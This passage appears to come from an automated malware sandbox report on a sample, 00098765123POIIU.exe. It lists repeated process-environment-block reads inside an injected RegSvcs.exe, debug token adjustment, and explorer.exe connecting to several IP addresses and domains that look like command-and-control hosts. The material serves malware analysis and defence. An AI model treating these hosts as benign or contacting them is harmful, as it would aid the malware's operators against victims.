          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDD294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01075BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010253CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE4A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD03E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD4BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01034257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDB390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD3B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FADB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FADB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0102A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01023540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01053D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010705AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDBC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01058DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBD5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD1DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD35A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDFD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD2581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FC7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE3D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD4D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01026CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010614FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0107070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD16E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD36CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE8EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01027794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01027794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01027794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FAC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FD8E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FE37F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01061608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0106AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FB8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0103FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01070EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_010246A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FBEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_0105FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDE730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_01078ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FA4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FCF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 3_2_00FDA70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\00098765123POIIU.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\wlanext.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\00098765123POIIU.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.217 80
          Source: C:\Windows\explorer.exeDomain query: www.maraitime.com
          Source: C:\Windows\explorer.exeNetwork Connect: 199.192.23.253 80
          Source: C:\Windows\explorer.exeNetwork Connect: 173.236.152.151 80
          Source: C:\Windows\explorer.exeDomain query: www.ihdeuruim.com
          Source: C:\Windows\explorer.exeDomain query: www.embraceblm.com
